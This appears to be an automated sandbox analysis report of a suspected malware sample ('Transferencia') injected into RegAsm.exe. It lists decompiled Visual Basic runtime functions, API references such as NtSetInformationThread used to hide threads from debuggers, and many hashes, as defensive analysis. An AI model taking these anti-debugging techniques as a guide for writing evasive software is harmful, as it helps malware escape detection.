Opcode ID: daad8b53f26b49ffc38ab44b4c40b6e53013abc1f1e0f38c5c632609c963093b
Instruction ID: b18cf59156409c941507b0e749e94b197ffebd9bd433b5d8235eecde308a7e2e
Opcode Fuzzy Hash: daad8b53f26b49ffc38ab44b4c40b6e53013abc1f1e0f38c5c632609c963093b
Instruction Fuzzy Hash: 8E31E27490024CEFCB01EF95D985BDDBBB0BF08704F10806AF911BB2A5DB795985DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004173FB, Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004173FB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v64;
				signed int _v68;
				char* _t36;
				signed int _t39;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t53 = _t52 - 0xc;
				 *[fs:0x0] = _t53;
				L004011F0();
				_v16 = _t53;
				_v12 = 0x4011c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4011f6, _t50);
				L00401292();
				if( *0x418010 != 0) {
					_v64 = 0x418010;
				} else {
					_push(0x418010);
					_push(0x414948);
					L004012FE();
					_v64 = 0x418010;
				}
				_t36 =  &_v44;
				L004012E0();
				_v48 = _t36;
				_t39 =  *((intOrPtr*)( *_v48 + 0x1ac))(_v48, _t36,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x340))( *_v64));
				asm("fclex");
				_v52 = _t39;
				if(_v52 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x4147fc);
					_push(_v48);
					_push(_v52);
					L00401304();
					_v68 = _t39;
				}
				L004012E6();
				_push(0x4174e6);
				L004012C2();
				return _t39;
			}

0x004173fe
0x0041740d
0x00417417
0x0041741f
0x00417422
0x00417429
0x00417438
0x00417441
0x0041744d
0x00417467
0x0041744f
0x0041744f
0x00417454
0x00417459
0x0041745e
0x0041745e
0x00417482
0x00417486
0x0041748b
0x00417496
0x0041749c
0x0041749e
0x004174a5
0x004174c1
0x004174a7
0x004174a7
0x004174ac
0x004174b1
0x004174b4
0x004174b7
0x004174bc
0x004174bc
0x004174c8
0x004174cd
0x004174e0
0x004174e5

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 00417417
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 00417441
__vbaNew2.MSVBVM60(00414948,00418010,?,?,?,?,004011F6), ref: 00417459
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417486
__vbaHresultCheckObj.MSVBVM60(00000000,?,004147FC,000001AC), ref: 004174B7
__vbaFreeObj.MSVBVM60 ref: 004174C8
__vbaFreeVar.MSVBVM60(004174E6), ref: 004174E0

Memory Dump Source

Source File: 00000000.00000002.902848355.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.902835212.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902866218.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.902871256.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2
String ID:
API String ID: 1725699769-0
Opcode ID: c569b068fee98ceb34f959458d6007dcae46d13cf2d4e8480e2abd149ec326fa
Instruction ID: 29557a3e9451cb818039caf3b1bcd09051441f46f913ae73d28ed6e68a6f27e4
Opcode Fuzzy Hash: c569b068fee98ceb34f959458d6007dcae46d13cf2d4e8480e2abd149ec326fa
Instruction Fuzzy Hash: B621F470A00208EFCB14EFA5D889BDDBBB4BB08718F10846EF501BB2A1CB785944DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00417130, Relevance: 10.6, APIs: 7, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00417130(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				char* _t29;
				signed int _t32;
				intOrPtr _t46;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_push(0x28);
				L004011F0();
				_v12 = _t46;
				_v8 = 0x401190;
				L00401292();
				if( *0x418010 != 0) {
					_v56 = 0x418010;
				} else {
					_push(0x418010);
					_push(0x414948);
					L004012FE();
					_v56 = 0x418010;
				}
				_t29 =  &_v40;
				L004012E0();
				_v44 = _t29;
				_t32 =  *((intOrPtr*)( *_v44 + 0x1c8))(_v44, _t29,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x38c))( *_v56));
				asm("fclex");
				_v48 = _t32;
				if(_v48 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x4147bc);
					_push(_v44);
					_push(_v48);
					L00401304();
					_v60 = _t32;
				}
				L004012E6();
				_push(0x417208);
				L004012C2();
				return _t32;
			}

0x00417135
0x00417140
0x00417141
0x00417148
0x0041714b
0x00417153
0x00417156
0x00417163
0x0041716f
0x00417189
0x00417171
0x00417171
0x00417176
0x0041717b
0x00417180
0x00417180
0x004171a4
0x004171a8
0x004171ad
0x004171b8
0x004171be
0x004171c0
0x004171c7
0x004171e3
0x004171c9
0x004171c9
0x004171ce
0x004171d3
0x004171d6
0x004171d9
0x004171de
0x004171de
0x004171ea
0x004171ef
0x00417202
0x00417207

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0041714B
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 00417163
__vbaNew2.MSVBVM60(00414948,00418010,?,?,?,?,004011F6), ref: 0041717B
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 004171A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004147BC,000001C8,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 004171D9
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004011F6), ref: 004171EA
__vbaFreeVar.MSVBVM60(00417208,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 00417202

Memory Dump Source

Source File: 00000000.00000002.902848355.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.902835212.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902866218.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.902871256.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2
String ID:
API String ID: 1725699769-0
Opcode ID: 3ef67aeff9f70704ab7f2bbb462a54a9155d40d379e95e2475bff1004a4d5f24
Instruction ID: 891ae4dc86439a73de278833737c0754afe011df5d2f876b714830d28958ff03
Opcode Fuzzy Hash: 3ef67aeff9f70704ab7f2bbb462a54a9155d40d379e95e2475bff1004a4d5f24
Instruction Fuzzy Hash: 9E21E875A41208AFCB00DF95C885BDDBBB9EB08714F20446EF101B72A1DBB95985DB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 7080 Parent PID: 6804 RegAsm.exeCOMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40.8%
Total number of Nodes:	355
Total number of Limit Nodes:	24

Executed Functions

Function 01370BF8, Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 662
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.!T, xrefs: 01370A55
down, xrefs: 01376165

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 1.!T$down
API String ID: 0-3297775217
Opcode ID: f222726e2f8578b796f1aafd7b4fa4113d504ba9276bbd91ecc260d07761390f
Instruction ID: fecaa025b1e2d08c120f55df2fb1026161734be89f1df6a035297350272801fd
Opcode Fuzzy Hash: f222726e2f8578b796f1aafd7b4fa4113d504ba9276bbd91ecc260d07761390f
Instruction Fuzzy Hash: C112DEB160430BAAFF356A6C8EB67FE375A9F533ACF540129EC43A7986C76CC4418611

Uniqueness

Uniqueness Score: -1.00%

Function 01376409, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 304
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 01376404

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1.!T
API String ID: 1029625771-3147410236
Opcode ID: fe11204883e9bae0d610cf7d1ecbf9d3aec7b75f233a3c562ad950af6d514bb4
Instruction ID: d652423cd2fefe06e0666abf7c7e8c0dcc827e58f928e83c198e582c798fc1b3
Opcode Fuzzy Hash: fe11204883e9bae0d610cf7d1ecbf9d3aec7b75f233a3c562ad950af6d514bb4
Instruction Fuzzy Hash: 33A1F4A020E349ABFB32FF6D8992FE53BD69B4765CF404854E882A7957C329E805C711

Uniqueness

Uniqueness Score: -1.00%

Function 01370724, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(01370837,?,00000000,0000510A,00000020,00000040,01370A1D,00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 013707EB
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: b16edb44f1ace06b5b929fb48eb75ca03e49d98af105013f5f1adf01d448aca2
Instruction ID: c172f9e8b8994157fd8acc9e7c813ff1d5727cb3b608d33f260f7616e7fbd7a1
Opcode Fuzzy Hash: b16edb44f1ace06b5b929fb48eb75ca03e49d98af105013f5f1adf01d448aca2
Instruction Fuzzy Hash: 6841287474430EAEFB38AE288DA17FA276A9F9739CF508115FC46A7594C63CC886C611

Uniqueness

Uniqueness Score: -1.00%

Function 01372C3F, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: e457348f8e0da4836d090cb1b103b1ddf0c79d99686d6065e1731863493433cc
Instruction ID: 05c859f2cddf6abb04279c5c29fe0282c4dff38b54a023aa77bf16f844d33b7a
Opcode Fuzzy Hash: e457348f8e0da4836d090cb1b103b1ddf0c79d99686d6065e1731863493433cc
Instruction Fuzzy Hash: BD61AAB070030AAFFB34AE288991BFA37A5AF5A3ACF504115FD42975D5D77CC881CA50

Uniqueness

Uniqueness Score: -1.00%

Function 013764F1, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 211
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 94f05f8677b6e05e19221c11c7e7579fe555d8192c5bf952f0731d49ab2a5af4
Instruction ID: bf0f80c2e9fd82a0bfd986d298536ecaa1bd19d2f4cefe61dc3aa9ad84c92cf2
Opcode Fuzzy Hash: 94f05f8677b6e05e19221c11c7e7579fe555d8192c5bf952f0731d49ab2a5af4
Instruction Fuzzy Hash: 0651E5B560470EEBFF349E148AA27FA3769AF5679CF804019EC4667A44D73C9C41CA41

Uniqueness

Uniqueness Score: -1.00%

Function 013708E7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 208
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 26fe9637b3545ce68eb2cdd84d60ea25726269e88d28937fe658face79b94627
Instruction ID: 6e832bdbc9a8f055a8d162904eed00848012cc718d79c7d832c47c1d456d5c9f
Opcode Fuzzy Hash: 26fe9637b3545ce68eb2cdd84d60ea25726269e88d28937fe658face79b94627
Instruction Fuzzy Hash: 7461272060A349BBFB36FF6D8981FE63BD69B4768CF440854FC96E3956C728E8458701

Uniqueness

Uniqueness Score: -1.00%

Function 0137084A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 8d93201fcba6fa1ba768ea2c11293290c04d94c5d1c7e2abad1eb463f2f99a7c
Instruction ID: 2bc226a70c2ad88d2213441ec6d195cfd1bd16d44c0176d71d04735b24cec3b1
Opcode Fuzzy Hash: 8d93201fcba6fa1ba768ea2c11293290c04d94c5d1c7e2abad1eb463f2f99a7c
Instruction Fuzzy Hash: D941887474930EABFB34AE288991BFA3B95AF9739CF004115FC86A7595C73C9842C701

Uniqueness

Uniqueness Score: -1.00%

Function 01370942, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: e44f11f7dfc54b5a00d762bb68082c64cfe4d8c515a40c5ba1583e6dc44e500c
Instruction ID: 6ea6d3657bd4c9faf9b0d462b9e5cd475e3a4810a76e5f9d117a42d4a71fac2b
Opcode Fuzzy Hash: e44f11f7dfc54b5a00d762bb68082c64cfe4d8c515a40c5ba1583e6dc44e500c
Instruction Fuzzy Hash: 6C41463074930EABFB35BE6C8991BF63B969F4768CF440455FC86A3596C728E8468201

Uniqueness

Uniqueness Score: -1.00%

Function 01370878, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 8650373492a2a373b6c56e89dc7adf335904569c385ee8ca9f8ab55325737331
Instruction ID: 10b0b1b4a7427506e12dcac677259385ac2c6b43e6b2b026604c03243cb6a770
Opcode Fuzzy Hash: 8650373492a2a373b6c56e89dc7adf335904569c385ee8ca9f8ab55325737331
Instruction Fuzzy Hash: F441553474930EABFB38AE288991BFA3B969F9739CF444055FC8693995C72CD846C701

Uniqueness

Uniqueness Score: -1.00%

Function 0137099A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: fcd2906d16cf527765c8dbf5beb793fd408ea5417e8923cc53d32fff8f3cf512
Instruction ID: 7b418f97fc58717c9b8ef563cf76bd550072968cfa0f05181bee31f664f17c84
Opcode Fuzzy Hash: fcd2906d16cf527765c8dbf5beb793fd408ea5417e8923cc53d32fff8f3cf512
Instruction Fuzzy Hash: F041663470A349ABFB36AE6C8991BF63B95AF4769CF440444FC82E3596C728E846C301

Uniqueness

Uniqueness Score: -1.00%

Function 013709C6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 022c27e86a3a4276b77062a69e597ac2138a5b7b669840cbee7cc8fbbec37ecd
Instruction ID: 158530909a8d4f15c4a5a172c4eb71814d0d821298921c9047c34e05c9f9c7d3
Opcode Fuzzy Hash: 022c27e86a3a4276b77062a69e597ac2138a5b7b669840cbee7cc8fbbec37ecd
Instruction Fuzzy Hash: DB415774749349ABFB36BE6C8991BF63B95AF4779CF440504FC82A3596C728E846C301

Uniqueness

Uniqueness Score: -1.00%

Function 01377BEA, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 1ef0c473c20d0b22e707a05fe070826de8f6c1976c8736a1635da26ff6314c21
Instruction ID: ad78140d67ed0ea0d5857d62d639d75e6512608e7caaf7d2a0265a2cf129658d
Opcode Fuzzy Hash: 1ef0c473c20d0b22e707a05fe070826de8f6c1976c8736a1635da26ff6314c21
Instruction Fuzzy Hash: 7C41497474430FEAFF386E244AA17FA3756AF9B38CF544115FC4693A94D73C88828601

Uniqueness

Uniqueness Score: -1.00%

Function 013769E2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 682fb43418010098d0b452550f1a77d7d20c6a54a1213ba2e015a98dddb3cad6
Instruction ID: bb2af8a95fd225a3d313227f402b7f46ad283c22373aa8f6fc5d042d775d3786
Opcode Fuzzy Hash: 682fb43418010098d0b452550f1a77d7d20c6a54a1213ba2e015a98dddb3cad6
Instruction Fuzzy Hash: B14158B474430EAAFF346E284AA17F62B665F9739CF544125FC87A35C5D72CC886C601

Uniqueness

Uniqueness Score: -1.00%

Function 0137096A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 144nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 8972e517577b9e03a2b37d15fa013a9459da72dc60ac83b2f700c0e7eb7b8b52
Instruction ID: f732399962860b5e68f77f16071b9bbafb53437aba2218b98b90dfc87550b7a8
Opcode Fuzzy Hash: 8972e517577b9e03a2b37d15fa013a9459da72dc60ac83b2f700c0e7eb7b8b52
Instruction Fuzzy Hash: 0A41453474930EABFB39AE2C8991BFA3B969F4778CF404415FC86E3596C768D8468201

Uniqueness

Uniqueness Score: -1.00%

Function 013708BA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 1520d4f64f75caf99d3972ad9784dfa45aa49a0c1659f13e9768dcb986534bc2
Instruction ID: 6eee82109908fb5585aacf3ddcde9b1a4fdef65bfc45c48032640f72c1f38d38
Opcode Fuzzy Hash: 1520d4f64f75caf99d3972ad9784dfa45aa49a0c1659f13e9768dcb986534bc2
Instruction Fuzzy Hash: C041897474530EAAFF34AE284A91BFA2B969F9738CF444014FC86A3595C73CCC46C201

Uniqueness

Uniqueness Score: -1.00%

Function 01370848, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: e61963e84dd0587911bebb04f9b97ddb4d8198101404ed3e8e94e9e5fb902871
Instruction ID: bfb7b79419b16d31781d9247b3999983bbfac29d0fc64f19cac1af70f37833b9
Opcode Fuzzy Hash: e61963e84dd0587911bebb04f9b97ddb4d8198101404ed3e8e94e9e5fb902871
Instruction Fuzzy Hash: F5315774B4430EAAFF386E244AA17FA2B669F9739CF444115FC86A39C4D73CCC868641

Uniqueness

Uniqueness Score: -1.00%

Function 01370A24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: f17486f01bcf1001a7bf02c8cda4413557857b200da7ce1ff9d5316d4280b8e7
Instruction ID: e44e2b99d69246937b3f20c1550ec192cd5e6b6a313a5301906e0424d157a8ac
Opcode Fuzzy Hash: f17486f01bcf1001a7bf02c8cda4413557857b200da7ce1ff9d5316d4280b8e7
Instruction Fuzzy Hash: 0B31377874930EABFB34BE6C49A1BFA3B659F4339CF540514FC86A3595C728D8468201

Uniqueness

Uniqueness Score: -1.00%

Function 01370A6E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 4b25ca37d01e3bc8a09bacbf3fb159cc00a4e7ad49f02be89c57188b6cf048d4
Instruction ID: 240a12fde836bb7e66382c3c690a744010a84bb1fa122b69554858b7f498c229
Opcode Fuzzy Hash: 4b25ca37d01e3bc8a09bacbf3fb159cc00a4e7ad49f02be89c57188b6cf048d4
Instruction Fuzzy Hash: E421067474530EABFF34BE6C89A1BEA3B96AF4739CF544118FC8693585C728D846C201

Uniqueness

Uniqueness Score: -1.00%

Function 013709FC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Strings

1.!T, xrefs: 01370A55

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 4379ee50a138c9c13fa91673bfe7ac2184ebdcef16be9f6e44ab17c6045e9383
Instruction ID: eb02ae9ed8b1aed014f445810322c02a46047eac6b6d9a2ff1a9c2bf87c8735d
Opcode Fuzzy Hash: 4379ee50a138c9c13fa91673bfe7ac2184ebdcef16be9f6e44ab17c6045e9383
Instruction Fuzzy Hash: 1921577864430E5BFB34BE2889A17FA2B669F9739CF440119FC86A3584C73CD94BC501

Uniqueness

Uniqueness Score: -1.00%

Function 01375079, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Strings

ntdll, xrefs: 013750B2

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ntdll
API String ID: 2994545307-3337577438
Opcode ID: d784da6689c6698babb384aa58119f3e32594be15020f77d0dbfffd0e10fd613
Instruction ID: 96621a6a85a85ab355f91326b56596c5dd6a19805b7028a0cb3746111e8455bd
Opcode Fuzzy Hash: d784da6689c6698babb384aa58119f3e32594be15020f77d0dbfffd0e10fd613
Instruction Fuzzy Hash: 0411C43110E3859FFB37FB6C8581ED93FE1EB13208B194889D4909B513C769B81AD795

Uniqueness

Uniqueness Score: -1.00%

Function 01371FD0, Relevance: 1.9, APIs: 1, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
